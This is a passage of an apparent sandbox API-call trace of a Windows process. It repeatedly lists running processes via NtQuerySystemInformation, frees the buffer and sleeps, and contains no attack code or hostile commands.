RegionSize=0xdea54*=0x20000) returned 0x0 [0254.914] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.918] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.919] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.920] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.921] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.921] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.921] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.922] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.925] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.926] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.928] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.928] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.929] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.929] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.930] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.934] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.934] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.936] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.936] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.937] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.937] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.938] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.941] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.942] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.944] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.944] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.945] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.945] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.945] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.949] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.950] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.951] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.952] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.952] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.952] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.953] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.956] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.957] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.959] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.959] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.960] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.960] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.961] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.964] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.965] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.967] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.967] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.968] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.968] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.968] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.972] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.973] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.974] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.974] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.975] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.976] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.976] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.979] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.980] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.981] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.982] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.983] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.983] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.983] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.987] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.988] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.989] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.990] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.991] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.991] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.991] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0254.995] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0254.996] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0254.997] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0254.998] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0254.998] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0254.998] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0254.999] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.002] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.003] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.004] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.005] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.006] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.006] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.006] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.010] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.011] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.013] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.013] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.014] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.014] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.014] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.018] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.019] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.021] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.021] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.022] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.022] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.022] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.026] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.027] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.029] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.029] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.030] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.030] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.030] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.035] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.036] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.037] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.038] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.039] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.039] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.039] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.042] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.043] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.045] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.046] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.046] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.046] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.047] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.050] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.051] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.052] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.053] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.053] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.053] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.053] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.057] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.058] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.059] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.059] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.060] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.061] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.061] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.064] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.065] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.069] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.070] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.070] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0255.070] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0255.071] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0255.074] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0255.074] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0255.076] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0255.076] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0255.077] 